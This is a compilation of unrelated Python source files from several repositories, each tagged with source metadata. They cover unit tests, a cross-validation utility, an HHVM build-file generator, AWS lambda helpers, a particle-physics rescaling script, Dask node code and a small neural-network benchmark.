def test_condition_multi(self):
names, values = ['first', 'last'], ['foo', 'bar']
conditions = [eq(name, value) for name, value in zip(names, values)]
where = Where(*conditions)
self.assertEquals(where.cql, ' AND '.join(cond.cql for cond in conditions))
self.assertEquals(where.values, values)
def test_invalid_condition_type(self):
conditions = ['foo']
self.assertRaises(ValidationError, Where, *conditions)
def test_none_condition(self):
conditions = [eq('name', 'foo'), None]
self.assertRaises(ValidationError, Where, *conditions)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jjensenmike/python",
"score": 4
} |
#### File: python/argparser/argparse_ex.py
```python
from argparse import ArgumentParser
def main():
"""main function run when called from the conditional below. Creates the
parser object, parses the responses, and prints out the screenname if one
is provided from the command line
"""
usage = 'Collect screenname info'
parser = ArgumentParser(usage=usage)
parser.add_argument('-n', action='store', dest='screenname', default=None,
help='screen name to pull information about')
args = parser.parse_args()
if args.screenname:
print 'Screen name to check: {}'.format(args.screenname)
else:
print 'No screen name info!!!'
if __name__ == '__main__':
main()
``` |
{
"source": "jjepsuomi/LPO-SCV",
"score": 3
} |
#### File: jjepsuomi/LPO-SCV/utils.py
```python
import numpy as np
import sklearn.metrics.pairwise as pw
import matplotlib.pyplot as plt
import random
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
--- CALCULATION OF LEAVE-PAIR-OUT FOLDS ---
DESCRIPTION:
- This function will produce fold set for leave-pair-out cross-validation
INPUT:
'Ydata': a n-by-1 matrix of output values
'neg_samples': integer specifying the number of data points with 'negative'
label. This function is needed by the LPO-SCV method.
OUTPUT:
'lpo_folds': list of leave-pair-out folds
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
def lpo_folds(Ydata, neg_samples):
posind = np.where(Ydata>0)[0]
negind = np.where(Ydata==0)[0]
lpo_folds = []
for i in posind:
negsample = random.sample(list(negind), neg_samples)
for j in range(neg_samples):
fold = [i, negsample[j]]
lpo_folds.append(fold)
return lpo_folds
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
--- USED FOR CALCULATING SORTED DISTANCE MATRIX ---
DESCRIPTION:
- This function will calculate all pairwise geographical distances between
the data points and returns a sorted matrix consisting from the distances
and additional matrix containing corresponding data point indices. This
function is needed by the SKCV method.
INPUT:
'coordinates': a n-by-2 array consisting from data point coordinates
OUTPUT:
'data_distances': a sorted n-by-n matrix containing all pairwise distances
'data_distance_indexes': a corresponding n-by-n matrix of data point indexes
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
def distanceMatrix(coordinates):
number_of_data_points = coordinates.shape[0]
data_distances = np.float32(pw.euclidean_distances(coordinates, coordinates))
data_distance_indexes = np.int32(np.zeros([number_of_data_points, number_of_data_points], dtype=np.int))
index_m = np.array(range(0, number_of_data_points, 1))
for i in range(0, number_of_data_points):
sorted_m = np.transpose(np.array([data_distances[:,i], index_m]))
sorted_m = sorted_m[sorted_m[:, 0].argsort()]
data_distances[:,i] = sorted_m[:,0]
data_distance_indexes[:,i] = sorted_m[:,1]
return data_distances, data_distance_indexes
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
--- USED FOR CALCULATING DEAD ZONE FOLDS FOR A GIVEN RADIUS r ---
DESCRIPTION:
- This function will produce dead zone folds used in SKCV given some radius
r by including into the provided previously calculated folds the indices of
data points which are "too close" (distance <= r) to the test data points.
These folds are used when forming the reduced training data sets. Reduced
in the sense that they do not contain data points too near to test points
INPUT:
'r': dead zone radius
'folds': array of cross-validation folds to be updated
'data_distances': n-by-n matrix of pairwise distances
'data_distance_indexes': corresponding matrix of indices to previous input
OUTPUT:
'dz_folds': updated array of 'folds' that includes data points too close to
test data points
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
def dzfolds(r, folds, data_distances, data_distance_indexes):
dz_folds = list()
# We loop through every previously calculated fold
for fold in folds:
tooCloseList = list()
# Find data points too close to test data points
for i in fold:
closeInds = np.where(data_distances[:,i] <= r)[0]
tooCloseList = list(set(tooCloseList).union(data_distance_indexes[closeInds,i]))
dzfold = fold[:]
# In addition to test data points, include into dzfold the indices of "too close" data
for j in tooCloseList:
if j not in dzfold:
dzfold.append(j)
dz_folds.append(dzfold)
return dz_folds
"""""""""""""""""""""""""""""""""""""""
--- VISUALIZATION OF SKCV PROCEDURE ---
"""""""""""""""""""""""""""""""""""""""
def visualize_skcv(coords, testcoords, dzcoords, r):
plt.figure(0)
mngr = plt.get_current_fig_manager()
mngr.window.wm_geometry("+0+0")
plt.clf()
plt.scatter(coords[:,0], coords[:,1], c='purple')
for t in range(0, testcoords.shape[0]):
circle1=plt.Circle((testcoords[t,0], testcoords[t,1]), r, color='orange', fill=True, alpha=0.2)
fig = plt.gcf()
fig.gca().add_artist(circle1)
plt.scatter(dzcoords[:,0], dzcoords[:,1], c='yellow')
plt.scatter(testcoords[:,0], testcoords[:,1], c='red')
plt.xlabel("EUREF-TM35FIN E")
plt.ylabel("EUREF-TM35FIN N")
plt.legend(['Training data', 'Omitted data', 'Test data'])
plt.title("SKCV PROCEDURE")
plt.axis('equal')
ax = plt.gca()
ax.set_facecolor('black')
plt.draw()
plt.pause(0.1)
""""""""""""""""""""""""""""""""""""""""
--- PLOT AND SAVE SKCV RESULTS ---
"""""""""""""""""""""""""""""""""""""""
def plotRes_skcv(performanceTable, ind, nfolds, method):
plt.figure(1)
mngr = plt.get_current_fig_manager()
window = plt.get_current_fig_manager().window
screen_x, screen_y = window.wm_maxsize()
mngr.window.wm_geometry("+"+str(int(screen_x/float(2)))+"+0")
plt.clf()
plt.plot(performanceTable[range(0, ind+1), 0], performanceTable[range(0, ind+1), 1], c='blue')
plt.plot(performanceTable[range(0, ind+1), 0], performanceTable[range(0, ind+1), 1], 'go')
plt.grid()
pcal = np.around(ind/float(performanceTable.shape[0]-1)*100, 1)
plt.title(str(nfolds) + "-fold SKCV C-index performance graph (" + str(method) + ")")
plt.xlabel("Dead zone radius (meters)")
plt.ylabel("C-index")
plt.draw()
plt.pause(0.1)
if pcal == 100:
plt.savefig(str(nfolds) + '_Fold_SKCV_Results_' + method + '.pdf')
"""""""""""""""""""""""""""""""""""""""""""""
--- VISUALIZATION OF LPO-SCV PROCEDURE ---
"""""""""""""""""""""""""""""""""""""""""""""
def visualize_lposcv(coords, testcoords, dzcoords, r):
plt.figure(0)
mngr = plt.get_current_fig_manager()
mngr.window.wm_geometry("+0+0")
plt.clf()
plt.scatter(coords[:,0], coords[:,1], c='purple')
circle1=plt.Circle((testcoords[0,0], testcoords[0,1]), r, color='orange', fill=True, alpha=0.2)
circle2=plt.Circle((testcoords[1,0], testcoords[1,1]), r, color='orange', fill=True, alpha=0.2)
fig = plt.gcf()
fig.gca().add_artist(circle1)
fig.gca().add_artist(circle2)
plt.scatter(dzcoords[:,0], dzcoords[:,1], c='yellow')
plt.scatter(testcoords[0,0], testcoords[0,1], c='red')
plt.scatter(testcoords[1,0], testcoords[1,1], c='blue')
plt.title("LPO-SCV PROCEDURE")
plt.xlabel("EUREF-TM35FIN E")
plt.ylabel("EUREF-TM35FIN N")
plt.legend(['Training data', 'Omitted data', 'Test (+) data', 'Test (-) data'])
plt.axis('equal')
ax = plt.gca()
ax.set_facecolor('black')
plt.draw()
plt.pause(0.1)
""""""""""""""""""""""""""""""""""""""""
--- PLOT AND SAVE LPO-SCV RESULTS ---
"""""""""""""""""""""""""""""""""""""""
def plotRes_lposcv(performanceTable, ind, nfolds, method):
plt.figure(1)
mngr = plt.get_current_fig_manager()
window = plt.get_current_fig_manager().window
screen_x, screen_y = window.wm_maxsize()
mngr.window.wm_geometry("+"+str(int(screen_x/float(2)))+"+0")
plt.clf()
plt.plot(performanceTable[range(0, ind+1), 0], performanceTable[range(0, ind+1), 1], c='blue')
plt.plot(performanceTable[range(0, ind+1), 0], performanceTable[range(0, ind+1), 1], 'go')
plt.grid()
pcal = np.around(ind/float(performanceTable.shape[0]-1)*100, 1)
plt.title(str(nfolds) + "-fold LPO-SCV C-index performance graph (" + str(method) + ")")
plt.xlabel("Dead zone radius (meters)")
plt.ylabel("AUC")
plt.draw()
plt.pause(0.1)
if pcal == 100:
plt.savefig(str(nfolds) + '_Fold_LPO-SCV_Results_' + method + '.pdf')
``` |
{
"source": "jjerazo3/Proyecto-Bimestral",
"score": 4
} |
#### File: jjerazo3/Proyecto-Bimestral/serie primos (1).py
```python
def SeriePrimos(limite1):
n = 0
d = 3
divisor = 1
suma = 0
primo = 0
estado = False
for k in range(1, limite1 + 1):
n = n + 1
while not estado:
for i in range(1, primo + 1):
if primo % i == 0:
divisor += 1
if divisor == 2:
d = primo
primo += 1
                estado = True
                divisor = 0  # reset the divisor count before searching for the next prime
else:
primo = primo + 1
estado = False
divisor = 0
if k % 2 == 0:
suma = suma - (n / d)
print(f' - {n} / {d}', end=" ")
else:
suma = suma + (n / d)
if k == 1:
print(f'{n} / {d}', end=" ")
else:
print(f' + {n} / {d}', end=" ")
estado = False
return suma
limite1 = int(input("Ingrese un límite:"))
print(' = ', SeriePrimos(limite1))
# In[ ]:
``` |
{
"source": "jjergus/hhvm",
"score": 3
} |
#### File: hphp/system/php_bzl.py
```python
import sys
import os.path
def _read_file_and_gen_bzl(path: str) -> str:
r = ""
r += f"# This file is {'@'}generated from `php.txt`.\n"
r += "# Do not edit manually, run `python3 hphp/system/php_bzl.py` instead.\n"
r += "SYSTEMLIB_SRCS = [\n"
with open(path) as f:
for line in f.readlines():
line = line.strip()
if not line or line.startswith("#"):
continue
r += f" \"{line}\",\n"
r += "]\n"
return r
def _generate():
php_txt = os.path.dirname(__file__) + "/php.txt"
php_bzl = os.path.dirname(__file__) + "/php.bzl"
contents = _read_file_and_gen_bzl(php_txt)
with open(php_bzl, mode="w") as f:
f.write(contents)
def _verify(php_txt: str, php_bzl: str):
with open(php_bzl, mode="rb") as f:
expected = f.read()
assert isinstance(expected, bytes)
actual = _read_file_and_gen_bzl(php_txt)
actual = bytes(actual, "utf-8")
assert expected == actual, "file need to be regenerated"
if __name__ == "__main__":
if len(sys.argv) == 1:
# This is to be invoked manually when `php.txt` changes
_generate()
elif sys.argv[1] == "verify":
# This is invoked as Buck test
[php_txt, php_bzl] = sys.argv[2:]
_verify(php_txt, php_bzl)
else:
raise Exception("unknown mode")
``` |
{
"source": "jjergus/packaging",
"score": 2
} |
#### File: aws/hhvm1/execution_status.py
```python
import json
import sys
from lambdas.common import all_execution_events
if len(sys.argv) < 2:
print('Usage: %s <execution-arn>' % sys.argv[0])
quit(1)
events = {e['id']: e for e in all_execution_events(sys.argv[1])}
finished = {}
for finished_event in events.values():
if finished_event['type'] == 'TaskStateExited':
started_event = finished_event
while started_event['type'] != 'TaskStateEntered':
started_event = events[started_event['previousEventId']]
finished[started_event['id']] = started_event, finished_event
unfinished = {
id: e for id, e in events.items()
if id not in finished and e['type'] == 'TaskStateEntered'
}
def output(s, f, prev):
details = s['stateEnteredEventDetails']
name = details['name']
if name == 'HealthCheck' or name.startswith('PrepareTo'):
return
out = [name]
input = json.loads(details['input'])
if type(input) == dict:
out.append(input.get('version'))
out.append(input.get('platform'))
if f:
timedelta = f['timestamp'] - s['timestamp']
out.append('(' + str(timedelta).rstrip('0') + ')')
prefix = ''
if prev:
if prev['type'].endswith('Succeeded'):
prefix = '\033[32m'
elif prev['type'].endswith('Failed'):
prefix = '\033[31mFAILED: '
print(' ' + prefix + ' '.join(o for o in out if o) + '\033[0m')
if finished:
print('Finished tasks:')
for s, f in finished.values():
output(s, f, events[f['previousEventId']])
print()
if unfinished:
print('Unfinished tasks:')
for s in unfinished.values():
output(s, None, None)
print()
```
#### File: hhvm1/lambdas/parse_input.py
```python
from datetime import date
import re
from activities import Activity, BuildAndPublishMacOS, MakeBinaryPackage
from common import is_binary_platform
def lambda_handler(event, context=None):
available_activities = {c.__name__ for c in Activity.__subclasses__()}
versions = []
platforms = []
activities = []
debug = ''
for part in parts(event):
if part in ['skip_ec2', 'skip-ec2', '--skip-ec2']:
debug = 'skip_ec2'
elif part in ['fake_ec2', 'fake-ec2', '--fake-ec2']:
debug = 'fake_ec2'
elif part in ['test', 'test_build', 'test-build', '--test', '--test-build']:
debug = 'test_build'
elif part in available_activities:
activities += [part]
elif re.fullmatch(r'[0-9]+\.[0-9]+\.[0-9]+', part):
versions += [part]
elif is_binary_platform(part):
platforms += [part]
if debug == 'test_build':
available_activities = [
MakeBinaryPackage.__name__,
BuildAndPublishMacOS.__name__,
]
for a in activities:
if a not in available_activities:
raise Exception(a + ' is not a valid test build step')
if not activities:
activities = available_activities
if not versions:
versions = [date.today().strftime('%Y.%m.%d')]
return {
'buildInput': {
'versions': versions,
'platforms': platforms,
'activities': activities,
'debug': debug,
}
}
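# Example (sketch): lambda_handler("4.153.1 skip-ec2") returns versions ['4.153.1'],
# no platforms, every available activity, and debug set to 'skip_ec2'.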
def parts(input):
if type(input) in [list, dict]:
if type(input) == dict:
input = input.values()
return [part for item in input for part in parts(item)]
return str(input).split(' ')
``` |
{
"source": "jjerhot/ALPINIST",
"score": 2
} |
#### File: ALPINIST/ALP_rescale/alp_2mu_rescale.py
```python
import numpy as np
from scipy.interpolate import RectBivariateSpline, interp1d
from os import path
import mpmath as mp
import alp_setup as setup
import alp_constants as c
import decay_widths as width
import argparse
# Derived from load_data.py for cross-check of B meson mode with 2mu decay
parser = argparse.ArgumentParser(description='ALP MC rescaling for C_ff coupling. \n Select the experiment')
parser.add_argument("-e","--exp", required="", type=str, help="Experiments available (case sensitive): exp = NA62 | CHARM | nuCAL | SHiP | DarkQuest | DUNE | SHADOWS. If not specified, running over all experiments available.")
parser.add_argument("-l","--lambda", dest="lam", default=1000, type=float, help="The \u039B [GeV] energy scale. Default value is \u039B = 1000 GeV")
args = parser.parse_args()
#experiment:
if not args.exp:
print("Running for all experiments available")
experiments = setup.experiments
elif args.exp in setup.experiments:
print("Running for ", args.exp, " experiment")
experiments = [args.exp]
else:
parser.error("Experiment " + args.exp + " not available. Experiments available: exp = NA62 | CHARM | nuCAL | SHiP | DarkQuest | DUNE | SHADOWS. If not specified, running over all experiments available.")
#scale
if args.lam <= 0:
parser.error("\u039B has to be a positive number.")
channels_decay = ['2Mu']
channels_production = ['BmesonK','BmesonKstar']
reference_couplings = {'BmesonK': 1e-10,
'BmesonKstar': 1e-10}
scaling_exponent = {'BmesonK': 1,
'BmesonKstar': 1}
coupling_production = {}
processed = 0.
constraint_dictionary = {}
boundary_dictionary = {}
#total decay width interpolation - only used for hadronic channels. Turned on for m_a > 300 MeV
total_width_digitized = np.loadtxt(path.dirname(path.realpath(__file__))+'/../widths/2mu_integrated/TotalWidth_gY1e-4.dat')
m_a_tot_steps = 1416
m_a_tot_list = np.array([total_width_digitized[i,0] for i in range(m_a_tot_steps)])
Gamma_a_tot_list = np.array([total_width_digitized[i,1] for i in range(m_a_tot_steps)])
Gamma_a_tot_inter = interp1d(m_a_tot_list, Gamma_a_tot_list)
for exp in experiments:
for chan_prod in channels_production:
filename_dat = path.dirname(path.realpath(__file__))+"/../tab_decay/"+exp+"/"+exp+'_'+chan_prod+'_2mu'+'.dat'
if path.exists(filename_dat):
experimental_constraint_data_dat = np.loadtxt(filename_dat)
experimental_constraint_data = np.delete(experimental_constraint_data_dat.reshape((201,101,3)),100,0)
# Extract the boundaries of the tabulated grid
boundary_dictionary[exp+'_'+chan_prod] = np.array([[experimental_constraint_data[0,0,0],experimental_constraint_data[-1,0,0]],[experimental_constraint_data[0,0,1],experimental_constraint_data[0,-1,1]]])
# Add a small number to avoid taking the logarithm of zero
experimental_constraint_data = experimental_constraint_data[:,:,:] + [0,0,c.epsilon]
# Take logarithm to make interpolation easier
experimental_constraint_data = np.log(experimental_constraint_data)
# Fast interpolation on rectangular grid
experimental_constraint_data_inter = RectBivariateSpline(experimental_constraint_data[:,0,0],experimental_constraint_data[0,:,1],experimental_constraint_data[:,:,2])
constraint_dictionary[exp+'_'+chan_prod] = experimental_constraint_data_inter
else:
print(filename_dat,' not found')
# If no file exists, we define the boundaries in such a way that the channel will be skipped in the calculations below
boundary_dictionary[exp+'_'+chan_prod] = np.array([[0, -1],[0,-1]])
def ALP_decays_single_channel(experiment, production_channel, m_a, Gamma_a):
boundary = boundary_dictionary[experiment+'_'+production_channel]
# Check if the requested value of m_a and Gamma_a lie within the tabulated range. Otherwise return zero.
if boundary[0,0] <= m_a <= boundary[0,1] and boundary[1,0] <= Gamma_a <= boundary[1,1]:
return (coupling_production[production_channel] / reference_couplings[production_channel])**scaling_exponent[production_channel] * (np.exp(constraint_dictionary[experiment+'_'+production_channel](np.log(m_a),np.log(Gamma_a))[0,0]) - c.epsilon)
else:
return 0
# Model-independent part
def ALP_events(experiment, m_a, g_Y):
Gamma_a = (g_Y*np.power(10,4))**2*np.power(10,Gamma_a_tot_inter(np.log10(m_a)))
number_of_decays = np.sum([ALP_decays_single_channel(experiment, channels_production[i], m_a, Gamma_a) for i in range(len(channels_production))])
Gamma_mumu = width.a_2Mu(m_a, g_Y/c.v)
BR_mumu = Gamma_mumu/Gamma_a
if BR_mumu > 1.:
BR_mumu = 1
if BR_mumu < 0.:
BR_mumu = 0
return number_of_decays * BR_mumu
def ALP_events_EFT(experiment, m_a, g_Y, Lambda):
global processed
processed += 1./48000
print("\r" + " processed: " + "{:.2f}".format(processed*100) + "%", end=" ")
#define B decay branching fraction
V_qb = [c.V_ub, c.V_cb, c.V_tb]
V_qs = [c.V_us, c.V_cs, c.V_ts]
h_bs = c.alpha_EM*g_Y*c.m_q[5]**2/(4*np.pi*c.m_W**2*mp.sin(c.theta_w)**2*c.v) * np.log(Lambda**2/c.m_q[5]**2) * sum([np.prod(q) for q in zip(V_qb, V_qs)])
BR_B_K_a = width.B_K_a(m_a,h_bs) / c.Gamma_B
BR_B_Kstar_a = width.B_Kstar_a(m_a,h_bs) / c.Gamma_B
global coupling_production
coupling_production = { 'BmesonK': BR_B_K_a,
'BmesonKstar': BR_B_Kstar_a}
return ALP_events(experiment, m_a, g_Y)
def ALP_events_exp(expName, Lambda):
# make lists of masses (2*E-1 to ~2*E+0) and couplings (E-6 to E-2)
global processed
processed = 0.
g_a_list = [ 10**(exponent/100-1) for exponent in range(-500,-100)]
m_a_list = [ 2*10**(exponent/100-1) for exponent in range(0,120)]
data_list_gY = [[ [m_a, g_Y, ALP_events_EFT(expName, m_a, g_Y, Lambda)] for g_Y in g_a_list] for m_a in m_a_list]
data_gY = np.reshape(data_list_gY,(len(m_a_list)*len(g_a_list),3))
# export
output_dir = path.dirname(path.realpath(__file__))+'/../tab_toPlot/'
outPath = output_dir + expName + '/'
outfileName = expName + '_gY.dat'
np.savetxt(outPath + outfileName,data_gY)
print('file ' + outfileName + ' saved to ' + outPath)
return
for exp in experiments:
ALP_events_exp(exp,args.lam)
``` |
{
"source": "jjermanis/pc-py",
"score": 4
} |
#### File: jjermanis/pc-py/challenge02.py
```python
from common import show_def_result, text_from_file
def main():
# Find the rare characters "in the mess" from the HTML source... I stored "the mess" in a file.
raw_data = text_from_file("challenge02text.txt")
# Get frequency of each character
histogram = {}
for c in raw_data:
histogram[c] = histogram.get(c, 0) + 1
# Get the "rare" characters. What does "rare" mean? In this case, it turns out "rare" means unique.
# But checking for any relatively small number gets the right answer
result = ''.join(c for c in raw_data if histogram[c] < 5)
show_def_result(result)
if __name__ == "__main__":
main()
```
#### File: jjermanis/pc-py/challenge10.py
```python
from common import show_return_result
def main():
# Continue the pattern. Each term is a description of the previous.
# 21 => 1211, because 21 is one 2 and one 1.
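    # The sequence runs: 1, 11, 21, 1211, 111221, 312211, ...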
curr_term = "1"
next_term = ""
for _ in range(30):
char_index = 0
ahead_index = 0
while char_index < len(curr_term):
while ahead_index < len(curr_term) and curr_term[ahead_index] == curr_term[char_index]:
ahead_index += 1
next_term += str(ahead_index - char_index) + curr_term[char_index]
char_index = ahead_index
curr_term = next_term
next_term = ''
show_return_result(len(curr_term))
if __name__ == "__main__":
main()
```
#### File: jjermanis/pc-py/challenge23.py
```python
import this
import codecs
from re import search
from common import show_hex_result
def hint():
print(codecs.encode("va gur snpr bs jung?", "rot_13"))
def main():
hint()
zen = codecs.encode(this.s, "rot_13")
answer = search("the face of ([a-z]+)", zen).group(1)
print()
show_hex_result(answer)
if __name__ == "__main__":
main()
``` |
{
"source": "jjerphan/dirty_cat",
"score": 2
} |
#### File: dirty_cat/test/test_super_vectorizer.py
```python
import pytest
import sklearn
import pandas as pd
from sklearn.preprocessing import StandardScaler
from sklearn.utils.validation import check_is_fitted
from sklearn.exceptions import NotFittedError
from distutils.version import LooseVersion
from dirty_cat import SuperVectorizer
from dirty_cat import GapEncoder
def check_same_transformers(expected_transformers: dict, actual_transformers: list):
# Construct the dict from the actual transformers
actual_transformers_dict = dict([(name, cols) for name, trans, cols in actual_transformers])
assert actual_transformers_dict == expected_transformers
def _get_dataframe():
return pd.DataFrame({
'int': pd.Series([15, 56, 63, 12, 44], dtype=int),
'float': pd.Series([5.2, 2.4, 6.2, 10.45, 9.], dtype=float),
'str1': pd.Series(['public', 'private', 'private', 'private', 'public'], dtype='string'),
'str2': pd.Series(['officer', 'manager', 'lawyer', 'chef', 'teacher'], dtype='string'),
'cat1': pd.Series(['yes', 'yes', 'no', 'yes', 'no'], dtype='category'),
'cat2': pd.Series(['20K+', '40K+', '60K+', '30K+', '50K+'], dtype='category'),
})
def test_super_vectorizer():
# Create a simple DataFrame
X = _get_dataframe()
# Test with low cardinality and a StandardScaler for the numeric columns
vectorizer_base = SuperVectorizer(
cardinality_threshold=3,
# we must have n_samples = 5 >= n_components
high_card_str_transformer=GapEncoder(n_components=2),
high_card_cat_transformer=GapEncoder(n_components=2),
numerical_transformer=StandardScaler(),
)
# Warning: order-dependant
expected_transformers_df = {
'numeric': ['int', 'float'],
'low_card_str': ['str1'],
'high_card_str': ['str2'],
'low_card_cat': ['cat1'],
'high_card_cat': ['cat2'],
}
vectorizer_base.fit_transform(X)
check_same_transformers(expected_transformers_df, vectorizer_base.transformers)
# Test with higher cardinality threshold and no numeric transformer
vectorizer_default = SuperVectorizer() # Using default values
expected_transformers_2 = {
'low_card_str': ['str1', 'str2'],
'low_card_cat': ['cat1', 'cat2'],
}
vectorizer_default.fit_transform(X)
check_same_transformers(expected_transformers_2, vectorizer_default.transformers)
# Test with a numpy array
arr = X.to_numpy()
# Instead of the columns names, we'll have the column indices.
expected_transformers_np = {
'numeric': [0, 1],
'low_card_str': [2, 4],
'high_card_str': [3, 5],
}
vectorizer_base.fit_transform(arr)
check_same_transformers(expected_transformers_np, vectorizer_base.transformers)
# Test with pandas series
expected_transformers_series = {
'low_card_cat': ['cat1'],
}
vectorizer_base.fit_transform(X['cat1'])
check_same_transformers(expected_transformers_series, vectorizer_base.transformers)
# Test casting values
vectorizer_cast = SuperVectorizer(
cardinality_threshold=3,
# we must have n_samples = 5 >= n_components
high_card_str_transformer=GapEncoder(n_components=2),
high_card_cat_transformer=GapEncoder(n_components=2),
numerical_transformer=StandardScaler(),
)
X_str = X.astype('object')
expected_transformers_plain = {
'high_card_str': ['str2', 'cat2'],
'low_card_str': ['str1', 'cat1'],
'numeric': ['int', 'float']
}
# With pandas
vectorizer_cast.fit_transform(X_str)
check_same_transformers(expected_transformers_plain, vectorizer_cast.transformers)
# With numpy
vectorizer_cast.fit_transform(X_str.to_numpy())
check_same_transformers(expected_transformers_np, vectorizer_cast.transformers)
def test_get_feature_names():
X = _get_dataframe()
vectorizer_w_pass = SuperVectorizer(remainder='passthrough')
vectorizer_w_pass.fit(X)
if LooseVersion(sklearn.__version__) < LooseVersion('0.23'):
with pytest.raises(NotImplementedError):
# Prior to sklearn 0.23, ColumnTransformer.get_feature_names
# with "passthrough" transformer(s) raises a NotImplementedError
assert vectorizer_w_pass.get_feature_names()
else:
expected_feature_names_pass = [ # Order matters. If it doesn't, convert to set.
'str1_private', 'str1_public',
'str2_chef', 'str2_lawyer', 'str2_manager', 'str2_officer', 'str2_teacher',
'cat1_no', 'cat1_yes', 'cat2_20K+', 'cat2_30K+', 'cat2_40K+', 'cat2_50K+', 'cat2_60K+',
'int', 'float'
]
assert vectorizer_w_pass.get_feature_names() == expected_feature_names_pass
vectorizer_w_drop = SuperVectorizer(remainder='drop')
vectorizer_w_drop.fit(X)
expected_feature_names_drop = [ # Order matters. If it doesn't, convert to set.
'str1_private', 'str1_public',
'str2_chef', 'str2_lawyer', 'str2_manager', 'str2_officer', 'str2_teacher',
'cat1_no', 'cat1_yes', 'cat2_20K+', 'cat2_30K+', 'cat2_40K+', 'cat2_50K+', 'cat2_60K+'
]
assert vectorizer_w_drop.get_feature_names() == expected_feature_names_drop
def test_fit():
# Simply checks sklearn's `check_is_fitted` function raises an error if
# the SuperVectorizer is instantiated but not fitted.
# See GH#193
sup_vec = SuperVectorizer()
with pytest.raises(NotFittedError):
if LooseVersion(sklearn.__version__) >= LooseVersion('0.22'):
assert check_is_fitted(sup_vec)
else:
assert check_is_fitted(sup_vec, attributes=dir(sup_vec))
if __name__ == '__main__':
print('start test_super_vectorizer')
test_super_vectorizer()
print('test_super_vectorizer passed')
print('start test_get_feature_names')
test_get_feature_names()
print('test_get_feature_names passed')
print('start test_fit')
test_fit()
print('test_fit passed')
print('Done')
``` |
{
"source": "jjerphan/distributed",
"score": 2
} |
#### File: distributed/distributed/node.py
```python
from __future__ import print_function, division, absolute_import
import warnings
from tornado.ioloop import IOLoop
from .compatibility import unicode
from .core import Server, ConnectionPool
from .versions import get_versions
class Node(object):
"""
Base class for nodes in a distributed cluster.
"""
def __init__(
self,
connection_limit=512,
deserialize=True,
connection_args=None,
io_loop=None,
serializers=None,
deserializers=None,
timeout=None,
):
self.io_loop = io_loop or IOLoop.current()
self.rpc = ConnectionPool(
limit=connection_limit,
deserialize=deserialize,
serializers=serializers,
deserializers=deserializers,
connection_args=connection_args,
timeout=timeout,
server=self,
)
class ServerNode(Node, Server):
"""
Base class for server nodes in a distributed cluster.
"""
# TODO factor out security, listening, services, etc. here
# XXX avoid inheriting from Server? there is some large potential for confusion
# between base and derived attribute namespaces...
def __init__(
self,
handlers=None,
blocked_handlers=None,
stream_handlers=None,
connection_limit=512,
deserialize=True,
connection_args=None,
io_loop=None,
serializers=None,
deserializers=None,
timeout=None,
):
Node.__init__(
self,
deserialize=deserialize,
connection_limit=connection_limit,
connection_args=connection_args,
io_loop=io_loop,
serializers=serializers,
deserializers=deserializers,
timeout=timeout,
)
Server.__init__(
self,
handlers=handlers,
blocked_handlers=blocked_handlers,
stream_handlers=stream_handlers,
connection_limit=connection_limit,
deserialize=deserialize,
io_loop=self.io_loop,
)
def versions(self, comm=None, packages=None):
return get_versions(packages=packages)
def start_services(self, default_listen_ip):
if default_listen_ip == "0.0.0.0":
default_listen_ip = "" # for IPV6
for k, v in self.service_specs.items():
listen_ip = None
if isinstance(k, tuple):
k, port = k
else:
port = 0
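# A service port spec may be an int, an "ip:port" string, or a tuple/list;
# normalize it below into a listen address and a port number.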
if isinstance(port, (str, unicode)):
port = port.split(":")
if isinstance(port, (tuple, list)):
if len(port) == 2:
listen_ip, port = (port[0], int(port[1]))
elif len(port) == 1:
[listen_ip], port = port, 0
else:
raise ValueError(port)
if isinstance(v, tuple):
v, kwargs = v
else:
kwargs = {}
try:
service = v(self, io_loop=self.loop, **kwargs)
service.listen(
(listen_ip if listen_ip is not None else default_listen_ip, port)
)
self.services[k] = service
except Exception as e:
warnings.warn(
"\nCould not launch service '%s' on port %s. " % (k, port)
+ "Got the following message:\n\n"
+ str(e),
stacklevel=3,
)
def stop_services(self):
for service in self.services.values():
service.stop()
@property
def service_ports(self):
return {k: v.port for k, v in self.services.items()}
``` |
{
"source": "jjerphan/joml",
"score": 3
} |
#### File: joml/examples/simple_benchmark.py
```python
from time import strftime, gmtime
import numpy as np
import os
from joml.network import Network
from joml.layer import Layer, SoftMaxCrossEntropyOutputLayer
from joml.functions import ReLu
from joml.utils import one_hot
np.random.seed(1337)
def load_sets(folder, dtype=np.float32, delimiter=","):
print(f"Loading dataset from {folder}")
x_train = np.loadtxt(os.path.join(folder, "x_train.csv"), dtype=dtype, delimiter=delimiter)
y_train = np.loadtxt(os.path.join(folder, "y_train.csv"), dtype=dtype, delimiter=delimiter)
x_test = np.loadtxt(os.path.join(folder, "x_test.csv"), dtype=dtype, delimiter=delimiter)
y_test = np.loadtxt(os.path.join(folder, "y_test.csv"), dtype=dtype, delimiter=delimiter)
x_train = x_train.T
x_test = x_test.T
# Conversion to integers
y_train = y_train.astype(int)
y_test = y_test.astype(int)
return x_train, y_train, x_test, y_test
if __name__ == "__main__":
# Loading data
data_folder = "../data" # set your own value
x_train, y_train, x_test, y_test = load_sets(data_folder)
y_train = one_hot(y_train)
y_test = one_hot(y_test)
# Defining the network
network = Network(input_size=14, name="14-100-40-4 Arch")
network.stack(Layer(size=100, activation_function=ReLu()))
network.stack(Layer(size=40, activation_function=ReLu()))
network.output(SoftMaxCrossEntropyOutputLayer(size=4))
# Printing information
print(network)
# Defining a log file
current_datetime = strftime("%Y-%m-%d-%H:%M:%S", gmtime())
logs_folder = os.path.join("..", "logs")
out_file = os.path.join(logs_folder, f"benchmark_{network.name}-{current_datetime}.csv")
# Benchmarking the network
logger = network.benchmark(x_train, y_train, x_test, y_test, csv_file_name=out_file,
num_epochs=10)
# Dumping results in a CSV file
logger.dump_results()
logger.plot_benchmark()
```
#### File: joml/joml/functions.py
```python
import numpy as np
class ActivationFunction:
"""
`ActivationFunction`s are used in `Layer`s to perform a non-linear mapping.
An `ActivationFunction` defines the value it returns for a given input.
It also defines the value of its derivative.
"""
def __init__(self, value, derivative):
self._value = value
self._derivative = derivative
def value(self, x_array):
